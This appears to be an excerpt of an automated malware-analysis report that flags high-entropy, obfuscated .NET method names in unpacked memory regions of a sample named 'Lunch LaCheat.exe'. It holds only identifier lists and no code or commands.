                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DNaNPDq8ZrMGeZQIvVs.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'E8lgLoy4DIupouCkFA4', 'qfMJ48yZiBo1MF6E6xD', 'Dnsdi7yadExYH8nmDvK', 'aaZ2GJySG17b0RKM8v6', 'ruelhNys0Mlegy5yhFb', 'EmpKriyV2eww67jAxOj'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, yDct3lUiBGykwYgZyNe.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Ywp8uokPlx', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, kNoIPAUkfQUI8omLQgL.csHigh entropy of concatenated method names: 'FBq8eOs3Gj', 'iYk8aS7c0M', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BhA8CKD54d', '_5f9', 'A6Y'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, JrnQWOUZjgUWBocdi9j.csHigh entropy of concatenated method names: 'MBRR4bRWZh', 'dljRVGDLuG', 'beok0xEKNU8oE97cVXm', 'gdJirtEYGwQsYO7TH7X', 'G79xv5EJNEIAhGT5SiY', 'QoDxrPE2nhOSeIhOmfP', 'K3u9F7E8gfcuJwL8ZKH', 'XY1BBlEGogCG7BLkJjZ', 'IWvHJ4EzyO62oyRATuK', 'ooaaDoC5R7I1otPmy6D'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, bakGY7MAQ9F1Mugfu6e.csHigh entropy of concatenated method names: '_5u9', 'spk5eP4tNn', 'TM82y63WOc', 'xlo5n38cPv', 'ijDmsq32Cuo0nkm71h4', 'pmmlbH38FgC7IgeCmJx', 'NW4GNa3GCqSCis5YyYb', 'mWl4Li3YuWPoZcZMbjd', 'km51sx3JGusXZGV2HKS', 'qjQnvL3zVIiVitrQV2c'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, xDRQIuqra1CCiX6RhhC.csHigh entropy of concatenated method names: 'WoGfqhwXAd', 'YrnffWIkRQ', 'r7XfMuFUTP', 'PYTUgp9slmjF66T3pwk', 'Ia5Xxi9Vf27RNkwaMvK', 'WrE7er9aBcWYBHcsRZ6', 'TaeQa99STGLKXrARlj9', 'aPsyRx9KgUfkIPH8rdh', 'KFxKGc9YHNCliTOGYpD', 'QgrFic9JXw9Kxa2Ttx1'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nfeO3JM26UEN4nRJB4s.csHigh entropy of concatenated method names: 'ryxJ1InLAp', 'RHUJ9E29Lj', 'oSNJpITRLy', 'G2fDwUDPjNV9ZqkedFq', 'syRVjODRUQgkNx8k4KP', 'MG67KADi32EoMii2f3c', 'sT2QmfDXYPr5JaU64AZ', 'QOpJ7GmX6g', 'QfIJgjDLxw', 'acyJSkOeR2'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, u7wHE5XO1AwJPYHADRh.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, wvbMxJXf3x1mW0ua4by.csHigh entropy of concatenated method names: 'vqbhJIrxhk', 'XIphZm7Lvs', '_8r1', 'ld4h2Y3rX2', 'Rw8hBdLFuK', 'D4Vh6BjHGm', 'ctAh5E2Uxm', 'sglmWPuWU0lZAiHDmmf', 'ORxqW4uwxm5BQ07tA5t', 'w4VfNvufi4GME3bSXCO'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, AjATmTqxd3qnyspZ8M5.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'HRIIYd0DFlTC15rYUVP', 'mfIPn10NrKEZSHpfdli', 'PNnWnR03P9hG97s8Bl3', 'jSP2Cd0tWTrMIgKLQvC', 'HqKcYM0x20fOVq54Itl', 'RtP49V0H5kTojw65eOq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, tuX3ojf34ChaxjRV6c1.csHigh entropy of concatenated method names: 'ghyMzmrMjj', 'GmityahLUc', 'XnGtqsvKl7', 'CwUtfEAeQC', 'gjXtMu01OW', 'J2Attg8s5b', 'QJgtUQo4xj', 'q40tXDejK9', 't9HtwGj4xZ', 'oEntJkXhwB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, dTG2gXqPUXjsYC5a9HK.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'gfA0Ju7oAp3APN5QL3C', 'eZuBA77ufnak5Wpyrgk', 'Dw99V67ha1rIRYe4Vq3', 'Hntrf37TKJpcDOdMdxc', 'jTckxA7UpNRoPA5bZOJ', 'XRP1sP7eydMZwiP1WHa'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, sHZJEsfKSVh1hmkvGfT.csHigh entropy of concatenated method names: 'zu5XJPnKAU', 'zwnXZTO1PP', 'doVHscfY2QU7y7n3M6h', 'DHJBGlfJchy0NpVeDY1', 'LdV8eMfVkHTJJlF33VL', 'bBU0WFfKxvYr9Xmxf1T', 'WijXSDZEAw', 'MrPWHnm50A7nn7X0Nbk', 'YvnqISmcdn5vSrLYj2i', 'LMfGohfGAKwhojfkFgx'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, COhgSqfcQyyy2PSOJQt.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'VSZU9M3hJ2', 'C35Upi0Ohg', 'pqQUdyyy2P', 'pOJUcQtL6R', 'CIsUTckToo', 'YXanqqfqhHSyA5ZR5IF', 'tOWOCQf9atQ2ptEERAZ', 'qlcaEGf7oTCAAyOB3oA'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, IYPXUgwBGoP6ag9jkCy.csHigh entropy of concatenated method names: 'c2HFvottUIahn', 'woorDbdXE0xTAYhMF0X', 'uNoJwbdW3AWhGTAQrxp', 'VnGffcdwfhM8aLCcLn8', 'SdFVEVdfu82GL510GMs', 'H9mrWodm0RYjQ0ahgOh', 'IIbfdRdixl71rfT5QOD', 'vAv2eFdPIA5BilCQAop', 'axohCLdl4aoI35uNqyP', 'rPVPQkdrFr6cLrseYA7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, KhVMlxXdSTGZrYZBTyq.csHigh entropy of concatenated method names: 'kjMacqd8Y1', 'dFM8QiUbOiNT3Wlx0o2', 'pAyrlDU1lyp62ZjBqB9', 'C38oNPUj1lyraUDysZK', 'w6QCLhUF0jmyoJeOycs', '_1fi', 'ILXeQHPI2t', '_676', 'IG9', 'mdP'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, kMDXZWXajKvT3fbPySM.csHigh entropy of concatenated method names: 'so7OZOmXcS', 'seBO2wr13U', 'Wx0OBVxFAh', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BgAO6GC7rc'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, t7eqoCq0pyA24xXUAbH.csHigh entropy of concatenated method names: 'evhqoFZ4P6', 'JsQfJC9ns5pCW5j6Tnf', 'JAoZp69QZvQqimDDTpb', 'pCKSdX95nALImpr7vLg', 'Y3k8MI9cPRFS30v5Oyr', 'UVr5F79BUJGC0yGL74u', 'wo6Vld9IE4g2E8H1jLL', 'B63ltQ96yh2GL5gwWIl', 'oiAqjLbTCJ', 'ECTyE49qwm3bGTHUN6L'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LdmVhiXGwe9HapiwJ8M.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TAXO8Cmnut', 'vrLOhm8dlH', 'lcQOOs0Sxx', 'zIYOeFJCIF', 'R5aOahOv5j', 'PslOCWUtKC', 'et4lt6TCIDuEr6rKuQq'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, UhmLkBf9fCvwgVYUfIA.csHigh entropy of concatenated method names: 'qlhUCmLkBf', 'AAWA8rw8JUlo7bj2IaY', 'aX3CKrwGKWf2XWiRpaP', 'KBeZMSwJJIVXm09Apou', 'hyc9HQw2JR8whLRhLc7', 'n00GNtwzblx8nC54JSQ', 'aeNhdAf5DcNWWJ3tCm5', 'kJ3fdTfcnhvxlTjh2c9', 'xKmModfnBy0oOACwRu5', 'hdv74ffQZ2tmZ3HEhpS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, GmeW25faKmNu3TDH8lC.csHigh entropy of concatenated method names: 'm6ItLu1ZjH', 'WVLtkWQbIi', 'iQ4tzxuYYV', 'VkDUyUfoJr', 'varUq8YInh', 'Bv1UfxxBty', 'jpeUMd3Gwn', 'ffrUt61Kw5', 'EYYUUZrHdC', 'KfNEPTWYJNYa4KaQ8lI'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, AM3dUaMPMLKtx58w5dK.csHigh entropy of concatenated method names: 'AOVJWefvU5', 'VUSJAFTekW', 'QAXJopur5Z', 'f8kJE1fDDg', 'mNZBiUDLQdo7fX17ZBY', 'wGIy5jDMdiueJuQpas0', 'W3TALFDEgsuXNX9Z2is', 'AT5QLEDOyuw53EOOgdu', 'pruHwBDvqlqlFTXC7gs', 'gww8HDDCKEfkOOWGwbE'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, EU7jgPqZUfCh0MEvB0O.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'JTKaa4777mfR36hCoHA', 'CpD0lE7yQdshseIwquJ', 'iH8cej7qsWR75prafpN', 'IZHsn479V12L7VHBJSQ', 'BgoW2570jjuUXFQBHNp', 'DUnnj07Ato88UNW52uw'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Ahc13dEy5KVP0BqE5E.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'hAMy1mBUDwEx2rXOl6l', 'loUJM1BeEu05t5cAgSC', 'xLwah6BdvRdcaJCgeFK', 'zIsF8oB4Ohst4mZHOyW', 'mDtiQxBZULvupYnONMx', 'vF1ADbBaBIOnm7Prudn'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LgEDIqhS04Car44Mop.csHigh entropy of concatenated method names: 'NJU99NQHq', 'RsnpVi0BZ', 'aAbdKrsDq', 'N3wegKcpgHwR2rr6u6Q', 'pYUR3lcEmMv2RIKJGbt', 'RYkQYscCtfQBwZ1qBsZ', 'py1TVDcoUrIscPVoM4j', 'n1yueqcu6FT4hHhRbcA', 'ejkrQIchrKMglcNdyH3', 'o80D58cT8bTeg0STeY8'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, TKA1axtODGwCsrAJYh2.csHigh entropy of concatenated method names: 'Dh9H1AxGpk', 'ULMH9RCGyd', 'Cx4Hp0QPMN', 'Ws7HdhJ44i', 'x8EHc1HL9o', 'rvHxM6glc1lvMehJWYV', 'RM55FGgfhTvBvTKUYZc', 'UOdxNegmV0i8bkOLHSx', 'gx7WIkgrCmroZnH364u', 'PgomNSgDf3esDNSHfV7'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, f8k1fDtZDguyRu368hC.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, SUHxo9tNj7gNTsIAV05.csHigh entropy of concatenated method names: 'ASg78iHlfC', 'JRI7O6QNB4', 'oHo7HOv6uy', 'PSQ7PChfg4', 'GQh77QXcEE', 'luM7g4nfsA', 'Rp47S9GewM', 'wvG7DiND8G', 'KHj73v7iMn', 'MNF7s8pjhS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, B0A2YIMzsWk7TS3uGdI.csHigh entropy of concatenated method names: 'QTZ2eYxb1w', 'MXr2aN0rRt', 'WmV2CoLnj2', 'TScQVcxhu1qXlhrMr6t', 'PjP3fgxTEVoLdOOUAtu', 'mS7e1FxokiJEbe4YJnK', 'dplGFjxutbvFpXvFTTi', 'vRoDi4xU3vHRgsJ91bH', 'wBhsrsxeOfq7uBa21LJ', 'ciuqhXxdPoS2OJgR3ju'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, yhRfLWt3k6bdGWArgmH.csHigh entropy of concatenated method names: '_7zt', 'Y2d5s7UQpN', 'L1I540HfXH', 'faI5VYRTcn', 'wS15I7tZAN', 'U1c5mxNXvh', 'Hg45uEn0ui', 'YqOicPk3qIJeIYTLNQ6', 'RowPfGktZ4vKdmJ6ayU', 'rOFyxvkDgj86hX7gl20'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, eCD4fOt5DPq948iwBGO.csHigh entropy of concatenated method names: 'erL6pJNwl4', 'tfI6drG2CP', 'C6N6coIPAf', 'SUI6T8omLQ', 'oLr6Kbe96U', 'MWA0wjHGk5xg7L7C3eq', 'Cic4tYHzZ5EcG8VYmr7', 'X7giRhH2Nb6hPeHOJjT', 'G7dIpfH8Om3Lwn6sjKJ', 'vTaFAWk5NyM67DkM9Ki'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Vb95fHU00YbhYDyu0gn.csHigh entropy of concatenated method names: 'qw5RjX5E4u', 'WK7RxA3kvh', 'DlyRFaKs7R', 'zaAZ6uCuOTrQQCO836R', 'dOL0plCpeVIMNhkew1d', 'BXmpOuCoUwnUe5BCqio', 'P6QUBJChv4C6xiEa0O0', 'jKMcgZCTWOkPwYQSAdq', 'pxHyKRCUvWKMttg2kcZ', 'NNfEdpCe43h4k4Xao3h'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, VMFniGxPuBqy8bufcO.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zPLBIJI6EAx2AuarbQN', 'a8VU2NI7hlQURo19q9X', 'Sem2FAIyQ0lGs9g5Jv3', 'mNTkmRIqiiVNQEglCu2', 'VHvEa4I9VtmwOVg7hUC', 'RFU3TgI0utCXWLQGj4R'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, qlXAoh1gngc2opxxXE.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'aylWtpi92', 'bkRHbAnMkiHllHmNCPr', 'zfe9y2nEZHlKM4NJHNc', 'ySuEJOnCRbb7HMHeWFd', 'bjiC8nnp0SmrslLefZW', 'oTUm6dnoR9vFeGY0KSB'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ScE4clqkd8XEwfbUW0Q.csHigh entropy of concatenated method names: 'OH3fmYWQbU', 'njgfuPUfCh', 'CMEfRvB0Oc', 'lYYCbQA0gq0hdyRggSO', 'jA3j8uAqlS3WG0i99jj', 'BAUOatA9ivHQqX57BbY', 'fPfRJmAAPsbnU2HAHFy', 'zpOlMpARosx03mAD4Fm', 'xatfDuAiR0j7IYdrLRh', 'IACDsBAPpipjifvZXUl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, USnMqttFK6BlomrJdIc.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'GjkP7CybKT', 'XmhPgyvQWU', 'r8j', 'LS1', '_55S'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, h6vuwetSTCvG7UVGrTy.csHigh entropy of concatenated method names: 'QXj5tbqNGh', 'EHN5UH0y3X', 'Niq5XVfIUT', 'pZaAH1kw9m1BCP98Ddp', 'dYDMN1kfqlvFXkd8234', 'lh7iiZkXQpwkl5pn0BU', 'gVrcfykWg6G2SRfcUtA', 'sAYATckmVN2tioX9gJ0', 'uSPpnyklCeAGqHelk9u', 'G3Zg4mkrR64KQ4AJyYl'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, r70NTtMtM1uhGa8tvNh.csHigh entropy of concatenated method names: 'ba8wnj0pnM', 'dQ6wWL6GZO', 'HPBwAC7FAa', 'qqmwoRnjG3', 'TsdwE0WyU9', 'icWwjffg5Z', 'J8irNElFIn7Wn6y2175', 'U6uf2Nlg2avZgNruTKk', 'QeO9Nllj2DyE3o8HkOT', 'UMm4x9lbpKZ5oTtANUS'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mBP0oLLioGhwXAdkrn.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'RD4vFCIKLIHllJerkY6', 'uvCP9wIYLrArEjhk36T', 'l3o5nHIJZ6Zu4y1Gyib', 'mo1tbvI2Zx5AqH6r5ZN', 'FIakaWI86otfJgW9sxD', 'cDlgDBIG7OAMCa9t6E0'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, KHdCRefmbkXs3K6gETN.csHigh entropy of concatenated method names: 'U2ttViaejt', 'eHqtIYFZSi', 'Yf8tmR0mCh', 'dKftuZJaha', 'YNotRMtWH5', 'vAiHkRW5DW67my42vGf', 'DGMhAhWcfBjt63gg8Ji', 'iFGOBvXGAF29XqhO46h', 'BQh4G0XzrsbXQeLGmKA', 'UH7Zw5Wn3n8D3mhT9rP'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, LMjjpmqliahLUcLnGsv.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'KfdqIZ0a3759TGBu5PR', 'dc2KE40SB5kdmDO36nt', 'WukPRJ0sGktsPStdt1N', 'XWbLkl0VAVrl3ZWaPF6', 'w2H7td0KNICT7stNJ3F', 'xYLhGd0YOhdnj9i3HJK'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, fttbW4MDcJoMNSH5luT.csHigh entropy of concatenated method names: 'qJXJYpW99r', 'J2gJldmVh1', 'GHjJvt3wrp', 'bk1JN6UCD4', 'bODJiPq948', 'hGmGUUN6i8Q9mATGUco', 'k5v9pUN7Av8ih4vYORN', 'mv1KLuNB9ITBxXnAx9k', 'k15qJMNImxrfpVGCfQW', 'JcDtgkNyl5ay1YPElJX'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, DAsN0KqaOCtdgS3tEyf.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'M6bISbqElc2gBTqnY69', 'gv7VZ3qCnc1PaSvp2Ir', 'aPJVY0qp1Ytv8ghp49E', 'hGXX9LqovAi91ujCX4d', 'YmHOsCqu74Uti3CRdZN', 'SlDBkJqhuCrggQ7uDub'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, UlZg75qsQwJiM21bO65.csHigh entropy of concatenated method names: 'lHIqCRnmAO', 'vMgMF0yfJ8TikhX2JrH', 'y0HOBuymjT37Y7qUx2h', 'w22e1AyWFE8HZhM0DNL', 'ANdsv9yw6wD9muTxSB5', 'twyKcYylT8BWuQF1YcT', 'saTZbGyrug8BVIVsd20', 'P92crFyDmlOTLF4bFuE', 'LNu749yN3gnq0LspyUI', 'f28'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, B0aWXNMnlXn2BLGMp6h.csHigh entropy of concatenated method names: 'sg9', 'Ulq51Ji3mp', 'AJXZLAKlpa', 'thE5H3BDVC', 'sTtO0B3ZeCiOkoYtyRi', 'fAqy4B3a2PsP4Csb2GE', 'vtMweA3SARa1hcsJZst', 'OiSpfI3dk3Lt4obXW8F', 'AJuwmF344OoGZRVvedm', 'YawJpm3sYwIUgtktTEe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, gI07OVUv4aW9pt78401.csHigh entropy of concatenated method names: 'wsB8tf822i', 'VUf8UA23TH', 'dQj8XeOEdi', 'LwO8w8sMco', 'sR58JxMG3p', 'kfR8ZR3xYr', 'fmk82qvu9R', 'riu8B4g1M9', 'kQk86mZJwj', 'RKe85rMYEe'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.csHigh entropy of concatenated method names: 'kB38y8dk5oW2xdKQBrP', 'G6ZbBJdgUO6CLx48d5K', 'dDPudsdxa6pJGbmnmKi', 'b0GZXwdH7ygfxCFOP1w', 'BkAGPB7unW', 'oZOOPmdb3qMR2OdZTra', 'N4YP0Cd1iuhaXhBVh26', 'NS4jk6dO3LJwCCJHcdh', 'cjeMFidvcwPeWVu3eAE', 'G4SHC9dLD6xHeQMsvhm'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zjoE3wqcjVQABWnuZwJ.csHigh entropy of concatenated method names: 'LDwqLbeMqa', 'bU33lM9CY6QbqkUuSXQ', 'edxOpB9puVMW4WRBXYU', 'u2okGP9MG0fEDvWvjeu', 'kDPEj09ExKrMrEl81QS', 'dv3GOp9o4yBpxyypgav', '_3Xh', 'YZ8', '_123', 'G9C'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, nldwCqME01ywJTeITCX.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'v0e5Yer2Yh', 'gGg2tdWOIW', 'hBV53OseBt', 'cuvwY2tiF6T0xlmhlRC', 'DbBHZOtP9vQ03rGX3cr', 'zyxEwctXsbdURV0wraa', 'T257FqtW9ce8SpJEWSC', 'SFoZ3ZtwJPZTejL75Gm'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, jVQRA9qILNDR4ueVNdL.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oktDTryxsKvOiykeSyp', 'aSXGyWyHbHVuvujaXVW', 'j9DsnTykvOXD7VqlgNy', 'VsEnKxygPhd1RbnlKLC', 'f2ttHIyjk17CiWnkXlh', 'LBdBwxyFOHpWMnIyeFy'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ykUT5HnIRnmAOVRT6X.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'eY2MbUB0PecUyh3V2wW', 'd8pkn0BAPJITW9DDqcq', 'Tv5aE7BR4L0wAL8jA7R', 'mMPINVBiepktgJ302Pr', 'M4gHVpBP6fZUQTFsMM1', 'cPKUSUBX6ioO9PN9JUd'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, zy6GHpNEirDwbeMqaG.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'YfPN9GIe92ZZpZ9hmoH', 'ADWV0RIdwoLO8FWq0Ir', 'c0DhSCI4rJqavKqnUCf', 'wHH5RqIZVucg3SkrGbq', 'pujxo0IaN1clKxhtVbC', 'XqoEwiISvg6R27NyE7H'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, j8yowCfSyTNdR3Qg4Jh.csHigh entropy of concatenated method names: 'z4DMLvf7yf', 'zwLMk4iAhK', 'IYjjs7PluGqUdZbLiIU', 'o2O2kGPrC5Li2fny4MT', 'onGWsrPDJhjoSEs4QKE', 'ECpQQ1PNIZyjHTTKWXl', 'skwvxXP31xojtFQeYcO', 'OUkWPoPtURsH0OCLxTV', 'SVewE2Px9vtFQksqGyF', 'jJ24xJPHrOK9SaMtxTS'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, X1FXHctVq7kE4pJRmYh.csHigh entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, XfZ5nTqO2eBgWgje4xu.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Lt3DSvqMxZcQ5oZBmim.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Jb85v1sq6IWCtQ7Vqu.csHigh entropy of concatenated method names: '_0023C', 'IndexOf', '_0023D', 'Insert', '_0023E', 'RemoveAt', '_0023F', 'get_Item', '_0023G', 'set_Item'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, vK3PiltUTHMLVDrDT8n.csHigh entropy of concatenated method names: 'FBr6S3mhmp', 'mvGkoXHmahBtZ5DeyAP', 's3yI1IHlnbYWQ0cDjsW', 'tubhBvHwJMxNiUtCSoD', 'f06gDqHfv0377bFQKfj', 'tXv20oib2p', 'TDc2G9dTCL', 'wwZ2bbYM8P', 'edZ214Srfu', 'q8N29cRarq'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, q8LHkBqBZc0BmxvQWYH.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'dc2h7s7l2bZ7ac2bgs5', 'XXkXrf7r24Mh4osJaef', 'BJKaqZ7DZBiopasUQXP', 'vOvdmP7NkIm7avuOprL', 'lb9aJS73vL1Cn8CVhEV', 'O9TKQq7t156fMSeGKyv'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, VwsI0eXAjxgDO5eO946.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'QhACZG1nuJ', 'gnxC2qDR75', 'xgbCBXBdC6', 'EC9', '_74a', '_8pl', '_27D', '_524'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, z8gUbRX871YUO6KvEjH.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ix9Miew8MmrhPUW6iG7.csHigh entropy of concatenated method names: 'A7EGRZWto2', 'MlUG8wO8sA', 'zjHGhA80h0', 'k1tGOFYPLo', 'H8kGetCy2q', 'cIMGa7LTR1', 'yQLGCpAmy2', 'nkHG0qyIkQ', 'h4SGGYebre', 'lokGbybUQ7'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ctiO1aUb80GXStvVQ3f.csHigh entropy of concatenated method names: 'sFTRYKjJvv', 'YFXRl2LSuZ', 'igKRvQ9RUr', 'aKNRNk5oQf', 'KGWRiMrEoo', 'q2hRL9enh2', 'vNOWsDCZGATwrY8gMq6', 'PJwbB8CdW955LNt4iEj', 'rvCMDxC4DFbmX1a1HI4', 'CaATkkCauyj44NtKGXO'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, nhbQX4wTCE0caeKIHB.csHigh entropy of concatenated method names: 'EQXH4TCE0', 'Yi8356vripC8ilFp0f', 'SSvq0R1MYTyTJUTY0G', 'HWNHdtOUXBWVAWXdIX', 'L0xsrELxFiDu0W9bFR', 'AiWZ4IMeVAmJ4F6jb1', 'OIIfH6Xm7', 'qkJML7FH5', 'wxltexwLw', 'mafUaGdQV'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Yarf2vfPQwRKas0dOld.csHigh entropy of concatenated method names: 'YcBMNnVE0A', 'bFKFfAPQdJqDSLdxsRN', 'Ui04YvPBQas2ifmOoHO', 'FOsO4HPc1PT3R8IgsnS', 'VKZ4elPnV1yPfUV0Mae', 'sBfOimPIjyexNZHuxP8', 'LsGyCqP6Y0Sw1YbN2SJ', 'Ga87hZP7Iypv8oK2YEZ', 'j6PrYqPyXHrUnWoAJsd', 'mwpOhCPqk5ZNWH9xbCN'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, RSx3mxln0wS0orPm0E.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'l2h1jXIjN1EHXRcdH8S', 'o2Ni80IFl7jUaGDcfSK', 'AVxZQ1IbsIs8ixlkEH7', 'rvguNmI1uOZvsnpN8hn', 'yiOQn9IOE4VjSvBjfxx', 'TZRaJjIvBLBitp2ap4b'
                        Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, Au6u9NXX2BPw1dlx1cN.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
